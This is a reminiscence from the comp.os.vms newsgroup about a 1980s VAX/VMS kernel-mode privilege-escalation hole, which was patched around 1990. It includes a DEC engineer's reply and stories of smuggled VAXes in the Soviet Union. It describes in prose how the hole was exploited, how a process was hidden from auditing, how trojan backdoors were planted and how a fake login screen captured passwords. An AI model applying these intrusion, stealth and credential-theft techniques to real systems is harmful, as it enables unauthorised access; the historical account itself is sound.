VAX/VMS great security hole (a reminiscence)

 

Subscribers to OpenVMS hobbyist program might remember that a little while ago John Egolf of HP suggested program participants to share personal recollections related to VMS, to commemorate the 35th anniversary of VMS initial release.

 

I briefly contemplated to write something along the lines of "VMS security holes exploits in young student days" or "Adventures of VAX/VMS behind the Iron Curtain", but had doubts whether these would be fitting subjects, so I did not, but with time passed, I thought I'd still share a certain recollection on the former subject in this, less formal venue (comp.os.vms).

 

Over my student days in mid-80's I came across a number of security holes in VMS. Getting, with a little help from my friends, my hands on VAX/VMS source kit, helped in this activity among others. Most of these holes would be considered "usual stuff" present day, such as stack buffer overruns in privileged programs, but in the 1980's explorations of this kind were newish and a kind of a petty frontier and entertaining challenge, akin to cracking mathematical riddles.

 

However the discovery of most magnificent and fascinating VMS hole I ever found came, surprisingly, not from looking into VMS sources, and even before I secured their possession for myself. At the time I discovered this particular hole I was armed only with DEC public VAX/VMS documentation set (system services and so on) and a photocopy of "Internals and Data Structures" (from the look of the latter, I think it was actually a photocopy of a photocopy), but albeit the latter was useful, it was not absolutely crucial -- I think the hole could have been discovered  by someone based on VMS standard documentation alone.

 

Indeed, the way I remember coming to spot it, I flipped back and forth certain pages in System Services manual and getting gut feeling: "there is just got to be a hole in here!". And indeed, there it was. Rephrasing the character from Capricorn One movie (https://www.youtube.com/watch?v=9uHhB_Wzccw), "first-magnitude, bona fide, made-in-the-USA security hole".

 

The hole let unprivileged user-mode program to switch into kernel mode.

 

But more spectacularly, the hole was tightly coupled into unique architectural design of VMS, and in its sly and teasing way showing off the importance of "V" in "VMS".

 

All other VMS holes I discovered are easily conceivable in other operating systems and are actually present in them, they are your today's "commodity holes".  Not the Great Hole. Although in a way it was very simple and represented an overlooked crack between principal OS components, it had an unique beauty, and was unique to VMS fundamental architecture. No hole of that particular nature is possible in any other operating system.

 

The hole was there most likely from day one of VMS, and definitely lasted throughout 3.x and 4.x timeframe, which is when I was using it. After that I ceased to be a student and also got VAXen of my own (a cluster of three VAXstation 3200's all running multiuser VMS and wired to multiple huge-capacity 850 MB drives, 9-track StorageTek tapes, Emulex terminal servers etc., making for a nice LEGO set), so poking holes lost former appeal, and I am not sure of subsequent Great Hole fate (a little more on that below). I will describe it as it stood tall in VMS 3.x and 4.x days.

 

As most here know, one unique feature of VMS was privileged shareable images (DLLs/DSOs in today's parlance)  that could contain code invoked in kernel or executive mode, aka protected-mode images.  This architectural feature allowed customers and 3rd parties to pack custom system calls into a DLL and develop custom privileged components accessing kernel-mode or executive-mode structures or routines. Custom privileged-mode (kernel-mode or executive-mode) code did not have to reside in a driver, instead those system extensions that need not be resident all the time could be implemented as DLLs and privileged-mode code would reside right in the DLL.

 

One very prominent example is a non-standard variation of the feature used by Oracle database, that had its shared data (SGA) stored in system-wide global section owned by supervisor mode, mapped into and accessible within process context, but not corruptible by user-mode code, and also private parts of SGA were not snoopable by user-mode code. To access the SGA, user-mode code did not have to go out of process, it just had to execute CHMS instruction and proceed in supervisor mode within a process, without incurring the cost of process context switch to access protected data.

 

The feature was also used to host some standard VMS system services that were used infrequently and did not need to be resident and be part of the kernel, such as MOUNT/DISMOUNT and few others.

 

Protected-mode image would typically contain the following sections:

 

1) Call vectoring section. In days of limited computer resources, image-to-image runtime binding was normally done not by symbols searchable at image activation time, but by binary offsets into target image. Shareable images exported symbols, however symbols were used only by linker (and dynamic loading routines similar to Linux dlopen/dlsym), but not by mainline runtime image activator. Instead, image would have a separate section at the very base of the image with one entry per exported routine, and the entry would contain a jump instruction to the actual routine body located somewhere inside the image. Grouping these call transfer vectors into vectoring section at the base of the image, all transfer vectors maintained at unchanged offsets from the base of the image, allowed this image to be changed and rebuilt without breaking compatibility with dependent images.

 

2) Optionally, some user-mode code sections. At a minimum, this typically will be code that executed CHMK and CHME instructions for execution of caller's requests. If memory serves, CHMx and RET could be fit into (1) as well, as long as you maintained proper padding after, to change it to BRW/JMP on need, so in the most basic case having user-mode section was optional. User-mode code could also be put into (4) as well, since both were read-only.

 

3) "Protected-mode vector section" or "CHMx vector section". Code in this section would be invoked by VMS CHMK/CHME handler, and would check CHMx code and if matching to codes served by this image, dispatch request to the handler in (4).

 

4) Kernel-mode or executive-mode code sections. These contained the code that would receive control from "protected-mode vector" dispatcher (3).

 

5) Data sections.

 

Control flow would be as follows:

 

user-mode code ->

xfer vector in protected-mode shareable image ->

CHMK(code) or CHME (code) ->

VMS CHMx (system call) dispatcher ->

for each protected-mode image activated in process, its CHMx vector ->

kernel-mode or executive-mode in the shareable image

 

To enable activation of protected-mode vector, protected image had to be installed in the system with INSTALL command specifying /PROTECTED option.

 

Just like for any other shareable image, INSTALL would at this point create system-wide global sections mapping image file sections, to speed-up subsequent activations of the image, and to provide sharing of the image code and read-only data between processes utilizing this image. Global sections would be named XXX_001, XXX _002 and so on, where XXX is the name of the image (XXX.EXE). When process was subsequently activating an executable linked to protected-vector image, the latter would be mapped into process address space like this:

 

              (image base/low VA)

    +-------------------------------------+

    |         Call xfer vector            |   XXX_001

    +-------------------------------------+

    |      User-mode code (if any)        |   XXX_002

    +-------------------------------------+

    |            CHMx vector              |   XXX_003

    +-------------------------------------+

    |  Kernel-mode or executive-mode code |   XXX_004

    |            (section 1)              |  

    +-------------------------------------+

    |  Kernel-mode or executive-mode code |   XXX_005

    |            (section 2)              |  

    +-------------------------------------+

    |                etc.                 |   XXX_006

    +-------------------------------------+

                  (high VA)

 

I.e. would have the same layout as any other installed image, including images installed merely for code sharing and activation speed-up, and as images installed with enhanced image privileges (akin to Linux setcap).

 

One essential difference was that global sections coming from protected-mode image (except those that were specifically marked otherwise) were created as owned by executive mode and having default protection of UR for code and UREW for data, so user-mode code was unable to alter neither the content of these pages, nor their mapping. All it could do was to invoke the code, and the only jump to kernel-mode or executive-mode code was only through CHMx "gate". So it was all very secure.

 

Except there was a tiny crack between two VMS subsystems: image activator and virtual memory, on one hand, and logical names on the other.

 

When activating any image, including protected-mode images, image activator would map into process address space each of the image's global sections earlier pre-created by INSTALL. This mapping was carried out using SYS$MGBLSC, a system call to map global section, specifying flag SEC$M_SYSGBL (i.e. limiting search for system-wide global sections only). It would map XXX_001, XXX_002 and so on. Each section was mapped at the offset from base VA of the image recorded in section descriptor in the image and subsequently moved to memory-resident INSTALL data.

 

What was overlooked, was that SYS$MGBLSC used logical names to translate section name before performing the mapping.

 

If SYS$MGBLSC was requested to map section XXX_005, but you had defined logical name GBL$XXX_005 => YYY_333, SYS$MGBLSC would map YYY_333 instead of XXX_005.

 

Note that you could not use your own (i.e. group-global) section named YYY_333. Because of SEC$M_SYSGBL flag limiting search to system-wide section names only, YYY_333 had to be system-global section, which could not be created without SYSGBL privilege. YYY_333 had to be a pre-existing system-global section.

 

However with typical system having dozens if not hundreds of system-global sections resulting from multitude of installed images, it was always easy to find an existing YYY_333 system-wide global section that, once GBL$ logical name redirection was defined, would get mapped in place of XXX_005, at address (relative to image base) intended for XXX_005. If YYY_333 were shorter than XXX_005, this would result in a layout

 

              (image base/low VA)

    +-------------------------------------+

    |         Call xfer vector            |   XXX_001

    +-------------------------------------+

    |      User-mode code (if any)        |   XXX_002

    +-------------------------------------+

    |            CHMx vector              |   XXX_003

    +-------------------------------------+

    |  Kernel-mode or executive-mode code |   XXX_004

    |            (section 1)              |  

    +-------------------------------------+

    |         Counterfeit section         |   YYY_333

    +-------------------------------------+

    |         (address space hole)        |   (HOLE)

    |            (unallocated)            |  

    +-------------------------------------+

    |                etc.                 |   XXX_006

    +-------------------------------------+

                  (high VA)

 

At this point it was a matter of identifying particular CHMx vector in XXX_003 that would dispatch high enough into XXX_005 that its target branch would obligingly land in the HOLE. Then you can create regular user-mode pages in the HOLE, fill them with your own code, call appropriate CHMx such as SYS$MOUNT and -- voila! -- you are in the kernel (or executive) mode, just as you ever wished to be.

 

The exploit depended on particular set of protected-mode images installed and their exact layout, but every single time I checked in VAX/VMS 3.x and 4.x timeframe, I was able to easily find a matching pair of XXX and YYY images that would work. Usually just checking on MOUNTSHR and DISMNTSHR was enough.

 

Most typical code you wished to put into your handler in the HOLE was to set process authorized privilege mask in CTL to all ones.

 

Also once in the kernel mode, and not being authorized by machine formal owners being there, it was prudent to set NOAUDIT flag in PCB, as well as DELPEN flag.

 

The latter marked process as "delete pending" which did not interfere with virtually any of its normal use, but prevented any "SHOW PROCESS" etc. against it -- in a word, you would have a cloak of invisibility (except of course for somebody possibly trying to look at the process using SDA). The gotcha was that you had to remember reset DELPEN before logging out. If you did not, the process would go into tight spin loop consuming as much CPU time as its priority allowed, with no regular way to kill it, and that would draw unwanted attention and lead to your downfall.

 

In retrospect, Great VMS Security Hole resulted from a relatively obscure feature of one component (GBL$ logical name translation by SYS$MGBLSC) overlooked by the developer(s) of another component (SYS$IMGACT), who were none other than originally Peter Lippman himself, followed at various times by Lawrence Kenah, with occasional stepping in by Kathleen Morse and Wayne Cardoza and few others, who were about as good developers/architects as one can only dream to get.

 

The bug would have been easily correctable by passing a flag limiting name translation to logical names defined either in EXEC or KRNL modes only, or (even more logically) limiting name translation to system-wide global names only if SEC$M_SYSGBL flag was specified in a call to SYS$MGBLSC.

 

The thing is, to the best my memory serves, although CPU mode attribute was always a part of logical name (it is present in original SYS$CRELOG service), but distinction between protected mode names and non-protected ones did not become prominent until DEFINE /EXECUTIVE_MODE was introduced as DCL command at some point in 4.x (albeit I may be remembering wrong about the timing). Although this would logically make the need to check for name mode even more urgent (since virtually all names were non-protected in a sense of CPU mode), but psychologically it might have helped to further obscure GBL$ translation by SYS$MGBLSC.

 

As I mentioned above, Great Hole was very much alive and well in VMS since probably day one throughout VMS 3.x and 4.x, which was when I was personally utilizing it.

I am not quite sure of its further fate.

 

On a minor note, naming scheme for global sections created by INSTALL had changed from XXX_nnn to INS$xxxxxxxx_nnn, where xxxxxxxx is hexadecimal address of KFE (known executable file block). However since KFEs are located in a somewhat predictable range of memory and are stepped with 16-byte granularity of allocation, it is easy and must not be computationally expensive to enumerate all possible values for xxxxxxxx and (looping SYS$MGBLSC on possible range of values) find out which ones are valid and map them to known installed images and their sections. In other words, it is not hard to find INS$xxxxxxxx_nnn equivalents for old XXX_nnn and YYY_nnn.

 

On a bigger note, somewhere during VMS 5.x time frame image activator added flag IAC$V_PARANOID meant to be forced when protected-mode images are activated. I did not purport to bother tracing exactly what this flag does (who really cares anymore?), but it appears to translate further to SEC$V_PARANOID that limits logical name translation to EXEC or KRNL mode names only, and thus presumably closes the Great Hole somewhere in 1993 timeframe and thus further in Alpha and Itanium codebases (the latter have also added IMAGCTX$V_TRUSTED_LNM flag in 2002 -- so much ado instead of just straightforward checking for SEC$M_SYSGBL).

 

Whether the closure is complete, I did not try to check and thus cannot tell.

Which I guess is no big deal.

It's all ancient history now.

 


One of the responses for this little memoir was from Andy Goldstein, one of the key VMS architects at DEC (and after its demise, Compaq and HP) from day one to termination of the remnants of VMS Engineering team by HP in 2009. 


Hi Sergey -

Good to hear from you!

I remember this one well. We called it the Novosibirsk bug, because it was reported to us by Mikhail Beilin at the Institute for Nuclear Physics in Novosibirsk. (He sent it to colleagues at CERN, and they passed it on to us.) We did indeed fix it in some V5.x version - can't remember exactly which one, but it was whatever VMS release went out after it was reported to us, somewhere around 1990. We might also have issued an emergency patch to all customers on support - we did that if there was any risk of a security bug becoming public knowledge.

I carried on an email conversation with Mikhail, since we wanted to send him a patch immediately and we needed to know what VMS version he was running. I'll never forget one of Mikhail's responses: "Unfortunately we are unlicensed VMS site. This is owing to historical reasons like Cold War." (Of course this didn't matter to us one way or the other. When someone reported a security bug we sent a patch and asked questions later.)

The nature of the bug is exactly as you described: The ability to substitute one protected shareable image for another with untrusted logical names, and then with clever matching up of shareable images, getting a kernel mode call redirected into address space under the user's control.

This was not a day 1 bug, however, and the way it came about is a typical case of lack of coordination of concurrent projects. We added protected shareable images in VMS V2.0 as part of a collection of real time support features. Larry Kenah did the image activator work for this. At the same time, Kathy Morse did shared memory support. This was for the MA-780 memory unit that could be connected to up to four VAX-11/780 cpus to provide high speed communication between the VMS systems. The shared memory support allowed event flags, mailboxes, and global sections to be located in the MA-780 and be shared among the VMS systems. This was where the logical name translation was added to $MGBLSC, to allow existing applications to redirect their global sections to the MA-780 without having to recode them.

Since these projects were concurrently developed, the interaction of logical names with protected shareable images was not discovered. Each project was reviewed against the design of the existing VMS system, but not against the other.

The change to limit logical name translation to trusted logicals (kernel and exec) did indeed fix this problem completely. (At least, as far as we ever heard.) The IAC$V_PARANOID flag is part of this logic. It is turned on to prevent any outbound calls from protected shareable images from being redirected with untrusted logical names. Inner mode code in protected shareable images is not supposed to call out to other shareable images, but in the case of mixed mode shareable images this can't be detected at image activation time. So we just protected all outbound calls and hoped the image designer knew what he was doing. (Admittedly a dubious assumption.)

The fix really did require using the SEC$V_PARANOID flag, expressly asserted by the image activator. The reason is that there is nothing wrong with using untrusted logical names for ordinary system global sections - as long as they can't be called as shareable images in inner mode. This was a feature we'd added in Kathy's work, and restricting logical name translation for system global sections would have broken user applications.

- Andy


To which I replied:


Hi Andy,

Thanks for your response.

> I'll never forget one of Mikhail's responses: "Unfortunately we are unlicensed VMS site. This is owing to historical reasons like Cold War."

I'd say general practice in the Soviet Union was that all licenses were considered country-wide, meaning one license was considered good to cover the whole country. ;-)

Cold War situation was undoubtedly one reason, but another was general perception about software deriving from the fact that there was no software development as industry in the USSR, so psychologically software was commonly looked at as something ephemeral and not rightfully deserving commercial value on its own, as a sort of documentation that ought just come free with the computer. Computer was iron and clearly had value, whereas software... one could not even touch it!

Indeed, a while back I was amused to come across an article by a professor of computer science at Leningrad University (with the author sounding a little like a leftist in the USSR... go figure!) dating as late as second half of 1980's and complaining that sadly some programmers are trying to keep the source code of their programs to themselves and even charge for the use of the programs, comparing such reprehensible practices to usury. (To make the article more amusing, its author these days works in the U.S. for a commercial software company.)

 So "country-wide license" approach was in a way Free Software Foundation, Soviet style.

With VMS specifically, due to the fact that VAXes had to be smuggled, their very existence (and therefore VMS use) was a hush-hush matter.

Although during mid-80's 11/780-s were a staple for technical computing used in dozens organizations throughout Moscow and around -- mostly in places under defense industries complex umbrella, but also certain Academy of Science institutions, and even places like GOSPLAN -- however security regulations did not allow to mention their very existence. When you had to refer to a VAX in printed materials or any circulated document you were supposed to use euphemisms, and when specifics were absolutely necessary refer to SM-1700 (Soviet 11/730 clone) even though the latter was still vaporware and not actually even being produced at the time.

So since VAXes in the Soviet Union "did not exist", the issue of unlicensed use of VMS and any layered software "did not exist" as well.

As one example, when I was purchasing those three VAXstation 3200's I mentioned earlier, I had to make a bet of the sorts. Soviet Union was not exactly flush with hard currency in the second half of 1980's, and even though ours was a comparatively privileged place, we still had a limited hard currency budget and needed to make most out of it, and we absolutely needed three VAXes running multiuser VMS: we needed to run a plant of 1500 workers designing and producing superconducting magnets and equipment for particle physics experiments, and therefore needed CAD/CAM workstations, multiple Oracle applications terminals and so on. On a hardware side, we could go for this with MicroVAX-es III with bundled multiuser VMS licenses, or we could go with VAXstation's 3200 and bundled single-user VMS (or even MicroVMS) licenses. The latter option was quite a bit cheaper, so we could spend more money on peripherals, and it was also giving us three GPX workstations to boot, but there was no telling whether VS3200 would run multiuser VMS out of the box -- if there were any VAXstations in the Soviet Union at that time at all, we did not know any owners, and almost certainly there were no VS3200's. So I had to make a kind of career bet and decided to take a risk that we'd go with VS3200's, and if multiuser VMS refuses to boot on VS3200 complaining this was not a licensed configuration, I would find the check in the binaries and patch it out (I had at the time source code only for late 3.x, but we needed to run 4.7 as well as subsequent versions, so in finding such a check I would have to be on my own). I remember booting and logging into VMS for the first time on VS3200 was tense since I did not have an idea whether it would boot fine or refuse to boot or enable more than one login session, and was preparing to take a dive for locating that "if" statement or statements. Luckily, owing to kind folks of Maynard, everything went fine without a glitch and any need to patch the system. ;-)

What's also funny is that we had plenty of data tapes (and people carrying tapes) going back and forth between our place and CERN, Fermilab, Lawrence Berekeley Lab and later SSC before the latter was shut down by the Congress, and many of these tapes were VMS BACKUP tapes recorded on 11/780-s and thus carrying actual unique CPU ID that could have been used to track down those friends of the Soviet Union that smuggled in the machines, but I guess intelligence folks on both sides have never figured this out. This seemed to be only a concern among our hardware engineers who ran the central cluster (initially composed of three 11/780-s): I remember talking to one of them, and they hoped to find somehow where the ID register was located and change its value, I do not know if they did.

Another thing I remember is that smuggling in an amusing way validated Karl Marx notorious observation in "Das Kapital" where he is quoting economist T.J. Dunning that “With adequate profit, capital is very bold.... 100 percent will make it ready to trample on all human laws; 300 percent, and there is not a crime at which it will scruple, nor a risk it will not run, even to the chance of its owner being hanged.”

At around 1987 when I was buying VAXstations, they were mass-produced, compact and thus easily smugglable and not realistically traceable. Price markup at this point for VS3200 itself was about 70% of its European price, and peripherals such as large-capcity Hitachi/Fujitsu disks, 9-track tape drives, Emulex controllers and terminal servers carried a 50% markup tag. With 11/780 during its heyday in early 80's it was very different: the markup was 3x. Similarly, FPS machines in mid-80's and Convex machines in late 80-s went for 3x of their price in the West -- just as Marx predicted. ;-)

Our place was also the only one in the USSR that had DECsystem-10. It was a KL machine running TOPS-10.

Unlike VAXes, DECsystem-10 was purchased legally, perhaps as a fruit of detente days.

I personally did not have much love for DECsystem-10, the architecture felt cumbersome and certainly lacked VAX elegance, so principal use I had for it was playing Star Wars. However some of my groupmates (co-eds) were undeterred by dated nature of DECsystem-10 and one of them found a way to set JACCT bit from an unprivileged process thus gaining superuser mode. My other groupmate ported Johnson PCC C compiler to TOPS-10 and wrote basic CRTL, which I guess was likely the only implementation of C on DECSystem-10 ever. 

The mention of patch reminded me of another funny story. When leaving for the US in 1993, I make a backup of my files, and left the tapes to friends, however I did not ask for these tapes until almost 20 years later, when I wished to look at some of these files for sentimental reasons (there were some sentimentally interesting things there, such as my own port of TCP/IP to VMS, lightweight "processes" framework in the kernel that I used to run in-kernel telnet server etc.). By that time, tapes were lost and I could not recover them. Our former cluster also, of course, long ceased to exist, and machines were junked. However someone told me that the room that once hosted the cluster still had a cupboard with tapes in it, possibly including backup tapes. With some help from old friends I managed to get in on site behind the barbed wire and into to that room. There was indeed a cupboard filled with tapes. I picked those that could be promising, transported them to California and read them here. Alas, none contained my files that I hoped to find, albeit I came across some historically interesting catches such as VMS 3.x (around 3.7 time) and 4.0 source kits which I was able to recover and handed to Computer History Museum. I also came across few of my old files that somehow survived, and one of them made me smile. It was a patch for TTDRIVER to enable Cyrillic keyboard handling. When trying to patch TTDRIVER, I ran into a bug in PATCH utility itself that was triggered when trying to patch an image composed of only a single section. So I had to patch the PATCH.EXE first to fix that bug, and then to use patched version of PATCH.EXE to patch TTDRIVER. (http://oboguev.livejournal.com/2590888.html

And the last couple of these funny stories. At the time I was working on VAX multiprocessor simulator, I visited Bernd Ulmann, who lives near Frankfurt (chances are, you might remember him, and you two definitely met, he used to be pretty active in German DECUS/CONNECT). He is the largest collector of VAX (and also some Alpha) equipment in Germany, and most likely in the whole world. He runs 24/7 publicly accessible VAX 7000/200 in his house basement, paying for this pleasure the electricity bill of 4K Euros a year. He also has a separate large house filled with various models of VAXes, including 7000, 6000 vector, 8000 series, MicroVAXes, VAXstations, HSCs, star couplers, RA disks, you name it. Some of the models he has are exotic. For instance, he has 3-CPU 8000 series machine (8330?) that was an engineering sample, but DEC Germany could never make it right, the machine would have intermittent bus resets, and DEC engineers could never figure out why. After a time, they gave up on it, and after some more time the machine landed at Bernd's barn. He also has a 32-processor Alpha (although he never powered it up so far, for fear light would go out in the whole village). That machine was a custom order filled by Compaq Germany for some German customer. While Compaq was putting together the machine, company that ordered it went out of business, but the machine was already made, so it sat at Compaq for a while, and eventually landed in Bernd's barn as well.

But one of his machines had perhaps an even more exotic fate: it was MicroVAX III that was being shipped from Germany to the Soviet Union in late 1980's, and German customs intercepted the shipping. While German authorities were trying to figure out what to do with it, customs put it in the warehouse, where it sat for next 20 years. In late 2000's German customs noticed that this box had been sitting there for 20 years, and it is time to do something about it after all. The box ended up at Bernd's barn. Bernd opened it, powered up this MicroVAX and installed VMS on it -- it worked flawlessly.

Few months after learning this story from Bernd (he told me about it pointing at this MicroVAX) I was at my old cluster room, taking out the tapes. My friend and I took selected tapes down to building entrance, but we needed to transport them to another building on site located about a mile away. Tapes were bulky and heavy, and carrying them this distance would have been difficult, so my friend called his colleague, also a physicist, who had car pass to the site. His colleague came in the car, and while we were loading tapes into the trunk, he looked at those tapes recorded 20 to 25 years ago and said:

– I kind of doubt you'll be able to read them.

In response I told him a story about Bernd's MicroVAX that sat for 20 years in the box and then worked just fine.

To which my friend's colleague responded with instinctive exclamation, without an instant of thinking:

– Of course! What could ever happen to it?! It's a VAX!


I also responded to another person with the following memories:


> When I was in college, I didn’t have that much time to hack privileges, so I got my elevated privileges via social engineering (watching privileged users type passwords) and then fixing my account  :-O

My very first VAX was 11/780 in northern Moscow.
They also had 11/750 sitting in the corner of the room but not powered up or used while we were there.
They needed operators to run the machine (780 one) 24/7, and their full-time operator staffing was only for daytime, so they needed someone to watch the machine at nights and on weekends, and for a time they hired students, about ten of us from MIPT, and at first they gave us SYSTEM password.

Why they wished to run the machine 24/7 eluded me, because nobody was running anything on it at night or on the weekends (no batch jobs etc.) until much later, so during day time we could use the machine in regular timeshared mode, but at nights and on the weekends the machine was all ours in almost every practical sense of the word, with typically only 2 or 3 (occasionally 4 or 5) of us present in the building. I guess not too many students in the world around 1984-85 could say they had their own toy 11/780. ;-)

My very first ("hello world", as it would be called today) application consisted of SYS$CMKRNL, MFPR and printf.

Three of four months later machine owners got the idea it might be undesirable to share system password with hired students, and they changed it, but by that time it was too late: we providently planted some trojan holes.

There is also a classical trick of getting the password, whereby you leave running on the terminal an application simulating the output of LOGOUT/FULL and printing "Username:" and "Password:" prompts, then recording captured password into a file, and printing the message that entered password was invalid and exiting the process. I.e. luring someone in by the look of pretended LOGOUT screen and then snooping the password at attempted "login". Such a program was written by one of my co-eds, in FORTRAN of all languages, just about 10-20 lines of code. I was skeptical whether somebody would fall for it, but it worked without a glitch and allowed us to recover SYSTEM password (not that it was much needed with all the pre-planted trojan holes, but still). Incidentally, the guy who wrote this FORTRAN program is now a CTO at Parallels (and also deputy-chairs computer science at MIPT), so if you are using Parallels on your Mac, beware: there may be this FORTRAN program still lurking somewhere there in the shades ;-)

P.S. Incidentally, few years later I participated in a project in another organization unrelated to this first one, but located right across the street, and using multiple 780's and 750's, and also some higher-performance equipment. One metro station down the street there also was another organization well known among other things for designing S-300 missile interceptors. I have never been there, but some of my co-eds had worked there and told various funny stories; albeit VAXes never came up in the subjects of those conversations, but I am pretty sure there should have been a good number of VAXes there as well -- probably making this particular spot having the highest number of VAXes per sq.ft. in all mid-80's Moscow. ;-)

- Sergey